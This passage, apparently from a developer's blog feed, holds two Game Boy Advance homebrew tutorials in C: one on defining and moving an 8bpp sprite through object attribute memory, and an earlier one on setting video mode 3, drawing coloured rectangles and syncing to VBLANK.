<td style="border:1px solid black;">Not Used Today</td>
</tr>
<tr style="border:1px solid black; background-color:#DDDDDD;">
<td>98 7654 3210</td>
<td style="border:1px solid black;">First Tile Index</td>
</tr>
</tbody>
</table>
</div>
<p><br /></p>
<p>It’s worth noting that some of these tables are different when you’re working in 4bpp mode. Eventually I’ll end up using all the options available for sprite drawing, but today I just want to move a thing across my screen.</p>
<p>Combining everything we just talked about: defining our 16x16, 8bpp sprite, at location 100,50, and starting with the tile at index [4][1] looks like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">volatile</span> <span class="n">ObjectAttributes</span> <span class="o">*</span><span class="n">spriteAttribs</span> <span class="o">=</span> <span class="o">&</span><span class="n">MEM_OAM</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr0</span> <span class="o">=</span> <span class="mh">0x2032</span><span class="p">;</span> <span class="c1">// 8bpp tiles, SQUARE shape</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr1</span> <span class="o">=</span> <span class="mh">0x4064</span><span class="p">;</span> <span class="c1">// 16x16 size when using the SQUARE shape</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr2</span> <span class="o">=</span> <span class="mi">2</span><span class="p">;</span> <span class="c1">// Start at [4][1]</span></code></pre></figure>
<p>You’ll notice that the index we pass to attr2 isn’t 1, which is what you’d expect to see passed there since we’re at element 1 of the array. However, the index stored in attr2 assumes that you’re using 4bpp sprites. If you’re using 8bpp like us, you need to go up by 2 indices every time you want to access the next tile.</p>
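<p>If the magic numbers above are hard to read, here is a minimal sketch of how they could be assembled from their parts. The helper and constant names (make_attr0, make_attr1, make_attr2_8bpp, ATTR0_8BPP, ATTR1_SIZE_16) are made up for illustration and aren’t part of the project’s code. They only cover the square, 16x16, 8bpp case used in this post:</p>

```c
typedef unsigned short uint16;

/* Hypothetical names for the bits used in this post. */
#define ATTR0_8BPP    0x2000u  /* attr0 bit 13: tiles are 8bpp */
#define ATTR1_SIZE_16 0x4000u  /* attr1 bits 14-15 = 01: 16x16 when the shape is SQUARE */

/* attr0 for a SQUARE (shape bits left at 0), 8bpp sprite at row y (low 8 bits). */
static inline uint16 make_attr0(unsigned y)
{
    return (uint16)(ATTR0_8BPP | (y & 0xFFu));
}

/* attr1 for a 16x16 sprite at column x (low 9 bits). */
static inline uint16 make_attr1(unsigned x)
{
    return (uint16)(ATTR1_SIZE_16 | (x & 0x1FFu));
}

/* attr2 counts tiles in 4bpp-sized steps, so an 8bpp tile index is doubled. */
static inline uint16 make_attr2_8bpp(unsigned tile8)
{
    return (uint16)((tile8 * 2u) & 0x3FFu);
}
```

<p>With these, make_attr0(50), make_attr1(100) and make_attr2_8bpp(1) give the same 0x2032, 0x4064 and 2 that are written by hand above.</p>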
<p>With that set up, we actually have (almost) everything we need to draw our sprite; we just need to set a few more flags on the display control register:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#define REG_DISPLAYCONTROL *((volatile uint16*)(0x04000000))
</span>
<span class="cp">#define VIDEOMODE_0 0x0000
#define ENABLE_OBJECTS 0x1000
#define MAPPINGMODE_1D 0x0040
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="p">...</span>
<span class="n">REG_DISPLAYCONTROL</span> <span class="o">=</span> <span class="n">VIDEOMODE_0</span> <span class="o">|</span> <span class="n">ENABLE_OBJECTS</span> <span class="o">|</span> <span class="n">MAPPINGMODE_1D</span><span class="p">;</span>
<span class="p">...</span>
<span class="p">}</span></code></pre></figure>
<p>As the names suggest, these flags tell the hardware to enable support for objects, and to expect tile memory to be stored as a 1D array. I’ve already covered all the info needed to understand what these mean, so hopefully they make sense now. If you’re confused about the 1D array flag, know that the only other option for tile mapping is in a 2D array, but in the interest of brevity (and imo, coding sanity), I’ve omitted that from this article. As usual, <a href="http://www.coranac.com/tonc/text/regobj.htm">Tonc</a> covers it very well if you’re interested in knowing more.</p>
<h2 id="putting-it-all-together">Putting It All Together</h2>
<p>All that’s left is to put together what we already have. Aside from the sprite include files I added earlier, all the code we need to move a sprite across the screen can easily fit below:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#include "sprite.h"
#include <string.h>
</span>
<span class="k">typedef</span> <span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">uint8</span><span class="p">;</span>
<span class="k">typedef</span> <span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">uint16</span><span class="p">;</span>
<span class="k">typedef</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">uint32</span><span class="p">;</span>
<span class="k">typedef</span> <span class="n">uint32</span> <span class="n">Tile</span><span class="p">[</span><span class="mi">16</span><span class="p">];</span>
<span class="k">typedef</span> <span class="n">Tile</span> <span class="n">TileBlock</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="cp">#define VIDEOMODE_0 0x0000
#define ENABLE_OBJECTS 0x1000
#define MAPPINGMODE_1D 0x0040
</span>
<span class="cp">#define REG_VCOUNT (*(volatile uint16*) 0x04000006)
#define REG_DISPLAYCONTROL (*(volatile uint16*) 0x04000000)
</span>
<span class="cp">#define MEM_VRAM ((volatile uint16*)0x6000000)
#define MEM_TILE ((TileBlock*)0x6000000 )
#define MEM_PALETTE ((uint16*)(0x05000200))
#define SCREEN_W 240
#define SCREEN_H 160
</span>
<span class="k">typedef</span> <span class="k">struct</span> <span class="n">ObjectAttributes</span> <span class="p">{</span>
<span class="n">uint16</span> <span class="n">attr0</span><span class="p">;</span>
<span class="n">uint16</span> <span class="n">attr1</span><span class="p">;</span>
<span class="n">uint16</span> <span class="n">attr2</span><span class="p">;</span>
<span class="n">uint16</span> <span class="n">pad</span><span class="p">;</span>
<span class="p">}</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">packed</span><span class="p">,</span> <span class="n">aligned</span><span class="p">(</span><span class="mi">4</span><span class="p">)))</span> <span class="n">ObjectAttributes</span><span class="p">;</span>
<span class="cp">#define MEM_OAM ((volatile ObjectAttributes *)0x07000000)
</span>
<span class="kr">inline</span> <span class="kt">void</span> <span class="nf">vsync</span><span class="p">()</span>
<span class="p">{</span>
<span class="k">while</span> <span class="p">(</span><span class="n">REG_VCOUNT</span> <span class="o">>=</span> <span class="mi">160</span><span class="p">);</span>
<span class="k">while</span> <span class="p">(</span><span class="n">REG_VCOUNT</span> <span class="o"><</span> <span class="mi">160</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">MEM_PALETTE</span><span class="p">,</span> <span class="n">spritePal</span><span class="p">,</span> <span class="n">spritePalLen</span> <span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">MEM_TILE</span><span class="p">[</span><span class="mi">4</span><span class="p">][</span><span class="mi">1</span><span class="p">],</span> <span class="n">spriteTiles</span><span class="p">,</span> <span class="n">spriteTilesLen</span><span class="p">);</span>
<span class="k">volatile</span> <span class="n">ObjectAttributes</span> <span class="o">*</span><span class="n">spriteAttribs</span> <span class="o">=</span> <span class="o">&</span><span class="n">MEM_OAM</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr0</span> <span class="o">=</span> <span class="mh">0x2032</span><span class="p">;</span> <span class="c1">// 8bpp tiles, SQUARE shape, at y coord 50</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr1</span> <span class="o">=</span> <span class="mh">0x4064</span><span class="p">;</span> <span class="c1">// 16x16 size when using the SQUARE shape</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr2</span> <span class="o">=</span> <span class="mi">2</span><span class="p">;</span> <span class="c1">// Start at [4][1]</span>
<span class="n">REG_DISPLAYCONTROL</span> <span class="o">=</span> <span class="n">VIDEOMODE_0</span> <span class="o">|</span> <span class="n">ENABLE_OBJECTS</span> <span class="o">|</span> <span class="n">MAPPINGMODE_1D</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">x</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">vsync</span><span class="p">();</span>
<span class="n">x</span> <span class="o">=</span> <span class="p">(</span><span class="n">x</span><span class="o">+</span><span class="mi">1</span><span class="p">)</span> <span class="o">%</span> <span class="p">(</span><span class="n">SCREEN_W</span><span class="p">);</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr1</span> <span class="o">=</span> <span class="mh">0x4000</span> <span class="o">|</span> <span class="p">(</span><span class="mh">0x1FF</span> <span class="o">&</span> <span class="n">x</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Voila! You are now in possession of your very own moving sprite. Notice that unlike last week, we don’t have to do any work to clear the screen (thanks objects!), and all it takes to move the sprite is to update the appropriate attribute.</p>
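<p>The loop above rebuilds attr1 from scratch every frame, which is fine when the size bits are the only other thing in there. If you’d rather not hard-code them, a small helper could swap out just the x field. This is only a sketch, and set_sprite_x and ATTR1_X_MASK are names I’m inventing here:</p>

```c
typedef unsigned short uint16;

#define ATTR1_X_MASK 0x01FF  /* attr1 bits 0-8 hold the x coordinate */

/* Hypothetical helper: replace the x field and leave the other attr1 bits alone. */
static inline uint16 set_sprite_x(uint16 attr1, int x)
{
    return (uint16)((attr1 & ~ATTR1_X_MASK) | (x & ATTR1_X_MASK));
}
```

<p>Inside the loop, that would look like spriteAttribs->attr1 = set_sprite_x(spriteAttribs->attr1, x); and it produces the same value as the hand-written version for our 16x16 sprite.</p>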
<p>Finally, I promised to link you to the tools that I used to generate the sprites, both of which were written by the author of the <a href="http://www.coranac.com/projects/tonc/">Tonc tutorial</a>. For bitmap editing (and bitmap palette editing), I used <a href="http://www.coranac.com/projects/usenti/">Usenti</a>, and for exporting that bitmap to the .c code we looked at, I used <a href="http://www.coranac.com/projects/grit/">Grit</a>. Both tools are very straightforward, but definitely don’t overlook Grit’s GUI client (helpfully called “WinGrit”); it makes life much easier.</p>
<p>That’s it for today! Hope you had as much fun as I did! As always, if you want to say hi, I’m most accessible <a href="https://twitter.com/khalladay">on Twitter</a>. Have a good one!</p>
GBA By Example - Drawing and Moving Rectangles2017-03-28T00:00:00+00:00http://kylehalladay.com/blog/tutorial/gba/2017/03/28/GBA-By-Example-1<p>The idea of making something for GameBoy has always appealed to me. Not only was it my platform of choice when I was a little kid, but naively, it has always looked like the relaxing combination of hardware simple enough to really understand, an OS (or BIOS) that gets out of your way (no firmware updates), and a platform that’s open enough to not need to deal with jailbreaking the device, and the GBA could do 3D!</p>
<p>I’ve had a <a href="http://krikzz.com/store/home/42-everdrive-gba-x5.html">Krikzz Everdrive</a> sitting around for a few months that I’ve meant to play with, and I finally had some time during my vacation last week to try it out. Behold the fruits of my labors:</p>
<div align="center">
<img src="/images/post_images/2017-03-31/snake.gif" style="width:240px;height:160px" />
<font size="2">(I on the other hand, cannot make the GBA do 3D yet)</font><br /><br />
</div>
<p>So, it isn’t exactly impressive, but it was a lot of fun, and I definitely want to play around with the GBA some more.</p>
<p>One of the great things about being late to the dev scene for a console is that lots of people have come before you and written great material, especially <a href="http://problemkaputt.de/gbatek.htm">GBATek</a> and the <a href="http://www.coranac.com/tonc/text/">Tonc Tutorials</a>. But what I really wish existed was a GBA version of the excellent <a href="http://metalbyexample.com/">Metal By Example</a>, which does an amazing job at easing into the nuts and bolts of the Metal API, by presenting each step as a small, buildable example.</p>
<p>Since that doesn’t exist for the GBA yet, I’m here to make that happen. To that end: this article is going to focus on the absolute minimum you need to know to draw and move rectangles around the screen on the GBA. You can do a lot with just that, and it feels great to see something moving on screen, so let’s get started!</p>
<h2 id="setting-up-your-dev-environment">Setting Up Your Dev Environment</h2>
<p>First things first, we’re going to need a way to run our project. As mentioned, I have an Everdrive GBA cart so I could put my stuff on actual hardware, but that’s completely overkill for this tutorial (and to be honest, most of the time it was faster to work in an emulator anyway). I downloaded <a href="https://sourceforge.net/projects/vba/">VisualBoyAdvance</a> to work with, which is a great open source emulator, but there are lots out there to choose from, and any of them should be able to do what we need them to do.</p>
<p>Secondly, we’re going to need a way to build our projects. There are fewer options here, and the one that I found the best was <a href="https://devkitpro.org/">DevKitPro</a>. This has tools for lots of platforms, but make sure you enable the GBA and ARM components when you’re installing. Once you have that installed, it’s time to set up your project. The easiest thing for me was to copy one of the makefiles from the devkitpro examples folder and simply change the name of the “sources” folder to the one that I was using for my build:</p>
<div align="center">
<img src="/images/post_images/2017-03-31/make.PNG" /><br />
</div>
<p>I placed that make file in the same directory as the folder which held my code (which was the root dir of my project). With that, all it took was a simple call to make to get a fully working GBA game!</p>
<p>If you’re dubious about this working, <a href="https://gist.github.com/khalladay/7c86f092a48342adf6d35aa2861b3ed3">this gist</a> has a minimal gba example which will clear the screen red. Try putting that in your source directory and running make, and then opening the result in your emulator of choice. If you see a red screen, everything is working as intended.</p>
<h2 id="setting-a-video-mode">Setting a Video Mode</h2>
<p>Ok, so now we know our build process works, it’s time to dig into the nuts and bolts of building something for gameboy!</p>
<p>The first thing we need to do is pick a video mode to use. The GBA has six different modes (numbered 0 through 5) that control how you draw to the screen. Eventually, I’m sure it will be good to know how to use each one of these modes, but mode 3 seemed like the easiest to use, so that’s where I started. What this means is that our screen buffer is going to be a 240 x 160, 16 bit buffer. It’s also going to be single-buffered, so if we want to change the pixel at (50,50) on the screen, all we need to do is go to that point in video memory and change the value there.</p>
<p>Now here’s where things started feeling weird to me: in order to set the gameboy to video mode 3, we need to set a display control register to the correct value. I expected that this meant there’d be a function to call, but there isn’t. What we need to do is go to memory address 0x04000000, and set the correct video mode flag there. It turns out that GBA dev is full of this paradigm - the hardware is simple enough that a lot of things can be controlled by a specific bit or byte being set, and rather than expose this via a system call, you just set the value directly at the appropriate address. Ahh, the wonders of old school tech.</p>
<p>Predictably, to set the hardware to video mode 3, we need to set the mode bits of the display control register (0x04000000) to 3 (more specifically 0x0003). We also need to enable a background. Which backgrounds you enable matters more in other video modes, but since we’re using mode 3, all we need to know is that background 2 needs to be enabled (the 0x0400 bit, which I’ve called BGMODE_2 below) in order for anything to show up.</p>
<p>We can set these values like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">typedef</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">uint32</span><span class="p">;</span>
<span class="cp">#define REG_DISPLAYCONTROL *((volatile uint32*)(0x04000000))
#define VIDEOMODE_3 0x0003
#define BGMODE_2 0x0400
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">REG_DISPLAYCONTROL</span> <span class="o">=</span> <span class="n">VIDEOMODE_3</span> <span class="o">|</span> <span class="n">BGMODE_2</span><span class="p">;</span>
<span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">){}</span>
<span class="p">}</span></code></pre></figure>
<p>A lot of tutorials use more concise constant names, and while they may be more standard (like REG_DISPCNT), I found it much easier to use more descriptive names. Additionally, you may be wondering why our pointer to the REG_DISPLAYCONTROL address needs to be marked “volatile.” This tells the compiler that even though nothing in our code reads from this address, we don’t want it to optimize away the logic that sets its value (since the hardware is going to look at this address).</p>
<p>You probably also noticed that I defined my own convenience type for unsigned ints. Since we’re going to do a lot of writing values directly to memory addresses, the size of our integers matters a lot, and typing “unsigned int” out all the time will drive you mad.</p>
<p>Lastly, you definitely noticed that the program immediately enters an infinite while loop. We really, really, don’t want to have our main function exit, since that would mean the gameboy game would exit, and what that means is undefined. So instead of a traditional game loop with a flag to control when to exit, game loops on GBA will always be infinite.</p>
<p>If you run this, it will (unsurprisingly) do nothing, so maybe we should tell it to do something?</p>
<h2 id="drawing-to-the-screen">Drawing To The Screen</h2>
<p>Like I mentioned before, in mode 3, we don’t need to worry about managing multiple color buffers, or working with tile maps, or anything else. All we need to do is set the pixels in video memory to what we want. This is virtually identical to what we had to do previously to set the video mode, except that the screen buffer starts at memory address 0x06000000:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">typedef</span> <span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">uint8</span><span class="p">;</span>
<span class="k">typedef</span> <span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">uint16</span><span class="p">;</span>
<span class="k">typedef</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">uint32</span><span class="p">;</span>
<span class="cp">#define REG_DISPLAYCONTROL *((volatile uint32*)(0x04000000))
#define VIDEOMODE_3 0x0003
#define BGMODE_2 0x0400
</span>
<span class="cp">#define SCREENBUFFER ((volatile uint16*)0x06000000)
#define SCREEN_W 240
#define SCREEN_H 160
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">REG_DISPLAYCONTROL</span> <span class="o">=</span> <span class="n">VIDEOMODE_3</span> <span class="o">|</span> <span class="n">BGMODE_2</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">SCREEN_W</span> <span class="o">*</span> <span class="n">SCREEN_H</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">SCREENBUFFER</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0xFFFF</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">){}</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span> </code></pre></figure>
<p>Running this now will get you a nice white screen. Progress! Note that we don’t dereference the pointer to the screen buffer in the macro, because we want to index into the screen buffer array to set pixels that aren’t the top left corner of the screen (on GBA, the Y axis increases as it gets lower on screen), and to do that, we need a pointer to the beginning of the array.</p>
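<p>Since the buffer is just one long array of rows, finding a pixel is a multiply and an add. Here’s a small sketch of that; pixelIndex and plotPixel are hypothetical helpers (not from the project), and the buffer is passed in as a parameter so the same code can be pointed at SCREENBUFFER on the GBA or at an ordinary array when testing on a PC:</p>

```c
typedef unsigned short uint16;

#define SCREEN_W 240
#define SCREEN_H 160

/* Row-major offset of pixel (x, y); (0, 0) is the top left, y grows downward. */
static inline int pixelIndex(int x, int y)
{
    return y * SCREEN_W + x;
}

/* Hypothetical helper: write one pixel, silently ignoring off-screen coordinates. */
static inline void plotPixel(volatile uint16 *buffer, int x, int y, uint16 clr)
{
    if (x < 0 || x >= SCREEN_W || y < 0 || y >= SCREEN_H) return;
    buffer[pixelIndex(x, y)] = clr;
}
```

<p>On hardware you’d call it as plotPixel(SCREENBUFFER, 50, 50, 0xFFFF); to light up the pixel at (50,50).</p>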
<p>The only sorta weird thing about this is how the GBA stores colours. Earlier I said that Mode 3 meant our screen was 16 bit color, but that’s not really true. The GBA actually uses 15 bit color, leaving the top bit of each 16 bit value unused. In the above example, we didn’t need to know this, because we were just setting things to pure white, but assuming you’ll want to write a colour that isn’t black or white, the following function comes in handy:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kr">inline</span> <span class="n">uint16</span> <span class="nf">MakeCol</span><span class="p">(</span><span class="n">uint8</span> <span class="n">red</span><span class="p">,</span> <span class="n">uint8</span> <span class="n">green</span><span class="p">,</span> <span class="n">uint8</span> <span class="n">blue</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="n">red</span> <span class="o">|</span> <span class="n">green</span> <span class="o"><<</span> <span class="mi">5</span> <span class="o">|</span> <span class="n">blue</span> <span class="o"><<</span> <span class="mi">10</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>To give credit where it’s due, the above function comes from the <a href="http://www.coranac.com/tonc/text/">Tonc tutorial</a>. As you may have guessed from the above, colours on the GBA are stored as 16 bit integers, with the data laid out like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="p">[</span><span class="n">unused</span> <span class="n">bit</span><span class="p">]</span> <span class="n">BBB</span> <span class="n">BBGG</span> <span class="n">GGGR</span> <span class="n">RRRR</span></code></pre></figure>
<p>Note that each colour getting only 5 bits means that channels can only store 1 of 32 values (0 - 31), so passing a number outside this range to the function is essentially useless. I’ve seen some other tutorials recommend AND-ing the passed in channel values with 0x1F to clamp them to a 5 bit value, but I feel like ensuring the inputs to your functions are correct is a problem for an assert in a debug build and not runtime cycles. That being said, how to debug a GBA game is beyond the scope of what I want to talk about today (and to be honest, outside the scope of what I know how to do right now), so maybe AND-ing isn’t such a bad idea:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kr">inline</span> <span class="n">uint16</span> <span class="nf">MakeCol</span><span class="p">(</span><span class="n">uint8</span> <span class="n">red</span><span class="p">,</span> <span class="n">uint8</span> <span class="n">green</span><span class="p">,</span> <span class="n">uint8</span> <span class="n">blue</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="p">(</span><span class="n">red</span> <span class="o">&</span> <span class="mh">0x1F</span><span class="p">)</span> <span class="o">|</span> <span class="p">(</span><span class="n">green</span> <span class="o">&</span> <span class="mh">0x1F</span><span class="p">)</span> <span class="o"><<</span> <span class="mi">5</span> <span class="o">|</span> <span class="p">(</span><span class="n">blue</span> <span class="o">&</span> <span class="mh">0x1F</span><span class="p">)</span> <span class="o"><<</span> <span class="mi">10</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
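<p>To double check the bit layout, it can help to go the other way and pull the channels back out of a packed colour. The sketch below repeats the masked MakeCol so that it compiles on its own; ColRed, ColGreen and ColBlue are names I’m making up for the example:</p>

```c
typedef unsigned char uint8;
typedef unsigned short uint16;

/* Same packing as above: red in bits 0-4, green in bits 5-9, blue in bits 10-14. */
static inline uint16 MakeCol(uint8 red, uint8 green, uint8 blue)
{
    return (uint16)((red & 0x1F) | (green & 0x1F) << 5 | (blue & 0x1F) << 10);
}

/* Hypothetical inverse helpers: shift the channel down, then mask off 5 bits. */
static inline uint8 ColRed(uint16 clr)   { return (uint8)(clr & 0x1F); }
static inline uint8 ColGreen(uint16 clr) { return (uint8)((clr >> 5) & 0x1F); }
static inline uint8 ColBlue(uint16 clr)  { return (uint8)((clr >> 10) & 0x1F); }
```

<p>Pure red, green and blue come out as 0x001F, 0x03E0 and 0x7C00, and white is 0x7FFF (the 0xFFFF we wrote earlier only differs in the unused top bit). Note that the mask wraps rather than saturates: MakeCol(32, 0, 0) is black, not bright red.</p>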
<p>You can use the above function to make any colour your screen is capable of displaying, but right now all we have is the logic to clear the screen to a colour. Let’s do something a bit more interesting and write the (hopefully) extremely simple function for drawing differently sized rectangles:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">drawRect</span><span class="p">(</span><span class="kt">int</span> <span class="n">left</span><span class="p">,</span> <span class="kt">int</span> <span class="n">top</span><span class="p">,</span> <span class="kt">int</span> <span class="n">width</span><span class="p">,</span> <span class="kt">int</span> <span class="n">height</span><span class="p">,</span> <span class="n">uint16</span> <span class="n">clr</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">y</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">y</span> <span class="o"><</span> <span class="n">height</span><span class="p">;</span> <span class="o">++</span><span class="n">y</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">x</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">x</span> <span class="o"><</span> <span class="n">width</span><span class="p">;</span> <span class="o">++</span><span class="n">x</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">SCREENBUFFER</span><span class="p">[(</span><span class="n">top</span> <span class="o">+</span> <span class="n">y</span><span class="p">)</span> <span class="o">*</span> <span class="n">SCREEN_W</span> <span class="o">+</span> <span class="n">left</span> <span class="o">+</span> <span class="n">x</span><span class="p">]</span> <span class="o">=</span> <span class="n">clr</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>That’s much more useful! Now we can make vertical and horizontal lines, and rectangles of all shapes and sizes. You can even divide up the screen into 8x8 blocks and set each one to something different if you feel like it!</p>
<div align="center">
<img src="/images/post_images/2017-03-31/screenfill.png" />
<font size="2">(I did)</font><br /><br />
</div>
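<p>One thing drawRect doesn’t do is check its arguments, so a rectangle that hangs off the right edge wraps around onto the next row, and one that hangs off the bottom writes past the visible buffer. If that worries you, a clipped variant might look something like the sketch below. drawRectClipped is a hypothetical name, and I’ve made the buffer a parameter purely so the function can be exercised against a plain array off-device:</p>

```c
typedef unsigned short uint16;

#define SCREEN_W 240
#define SCREEN_H 160

/* Hypothetical variant of drawRect that clamps the rectangle to the screen
   before writing, so nothing wraps to the next row or lands off-screen. */
void drawRectClipped(volatile uint16 *buffer, int left, int top,
                     int width, int height, uint16 clr)
{
    int right = left + width;    /* one past the last column to fill */
    int bottom = top + height;   /* one past the last row to fill */

    if (left < 0) left = 0;
    if (top < 0) top = 0;
    if (right > SCREEN_W) right = SCREEN_W;
    if (bottom > SCREEN_H) bottom = SCREEN_H;

    for (int y = top; y < bottom; ++y)
    {
        for (int x = left; x < right; ++x)
        {
            buffer[y * SCREEN_W + x] = clr;
        }
    }
}
```

<p>The extra comparisons happen once per rectangle rather than once per pixel, so the inner loop costs the same as the original.</p>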
<p>But this is only useful if you want to make static images appear on your screen, and the title of this post also promised that our rectangles would move, so it’s time to move inside our infinite game loop and do some work there.</p>
<h2 id="the-gba-drawing-process">The GBA Drawing Process</h2>
<p>Before we get to the fun stuff though, I need to talk briefly about how the GBA takes the data in the SCREENBUFFER array and draws it on the screen.</p>
<p>The GBA draws each row of the screen sequentially, and serially (one after the other). Updating a pixel on the screen takes the hardware 4 cycles, which means that updating a single row of the screen takes 4 * 240 (960) cycles, since each row is 240 pixels wide. At the end of each row, the hardware pauses briefly. This pause is known as the Horizontal Blank, or HBLANK, and takes as long as it would take the hardware to update another 68 pixels (272 cycles).</p>
<p>This process continues for each row on the screen. Once all the rows have been updated, there is a larger pause called the Vertical Blank, or VBLANK. This pause lasts as long as it would take the hardware to update 68 more rows of pixels (including the HBLANK time). This works out to 4 * (240 + 68) * 68, or 83776 cycles. These numbers will be very important in more complex projects, but are included here just because I thought it was good info to know.</p>
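<p>If you’d like to see that arithmetic spelled out, here it is as a handful of compile-time constants. The names are mine, and the only inputs are the figures quoted above (4 cycles per pixel, a 240 x 160 screen, 68 pixels of HBLANK and 68 rows of VBLANK):</p>

```c
#define CYCLES_PER_PIXEL 4
#define SCREEN_W 240
#define SCREEN_H 160
#define HBLANK_PIXELS 68
#define VBLANK_LINES 68

enum {
    HDRAW_CYCLES    = CYCLES_PER_PIXEL * SCREEN_W,       /* 960: visible part of a row */
    HBLANK_CYCLES   = CYCLES_PER_PIXEL * HBLANK_PIXELS,  /* 272: pause after each row */
    SCANLINE_CYCLES = HDRAW_CYCLES + HBLANK_CYCLES,      /* 1232: one full row */
    VDRAW_CYCLES    = SCANLINE_CYCLES * SCREEN_H,        /* 197120: all visible rows */
    VBLANK_CYCLES   = SCANLINE_CYCLES * VBLANK_LINES,    /* 83776: pause after the last row */
    FRAME_CYCLES    = VDRAW_CYCLES + VBLANK_CYCLES       /* 280896: one whole frame */
};
```

<p>So VBLANK is a bit under a third of every frame. Assuming the GBA’s CPU clock of roughly 16.78 MHz (a figure that isn’t covered in this post), 280896 cycles per frame works out to just under 60 frames per second.</p>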
<p>This drawing process is going to occur no matter what our code is doing, without us having to tell the hardware to do it, which means that any code which modifies the data in the SCREENBUFFER array, should do so in the VBLANK pause. Otherwise, we could update the screen halfway through it being drawn, which would lead to tearing artifacts where part of the screen is displaying 1 frame behind other parts.</p>
<p>This means that we need to be able to detect when we’re in VBLANK! There are two ways to do this: the proper way and the easy way. For my first attempt at GBA dev, I chose the easy way:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="cp">#define REG_VCOUNT (* (volatile uint16*) 0x04000006)
</span><span class="kr">inline</span> <span class="kt">void</span> <span class="nf">vsync</span><span class="p">()</span>
<span class="p">{</span>
<span class="k">while</span> <span class="p">(</span><span class="n">REG_VCOUNT</span> <span class="o">>=</span> <span class="mi">160</span><span class="p">);</span>
<span class="k">while</span> <span class="p">(</span><span class="n">REG_VCOUNT</span> <span class="o"><</span> <span class="mi">160</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>The value at REG_VCOUNT holds the index of the current row being drawn to by the hardware. The above function simply waits until we are at an index that is beyond the height of the screen (160). If called inside VBLANK, it will block until the next VBLANK is hit. Is this awful and complete overkill? YES! It also works pretty nicely for something as simple as a moving rectangle game.</p>
<p>It’s worth noting that you are free to do any calculations you want during VDRAW (what it’s called when the hardware is not in VBLANK), as long as you don’t update the values in the screen buffer.</p>
<p>Using the above vsync() function, we can finally add some animation, since the function above not only blocks until VBLANK, but will also block until next frame:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">REG_DISPLAYCONTROL</span> <span class="o">=</span> <span class="n">VIDEOMODE_3</span> <span class="o">|</span> <span class="n">BGMODE_2</span><span class="p">;</span>
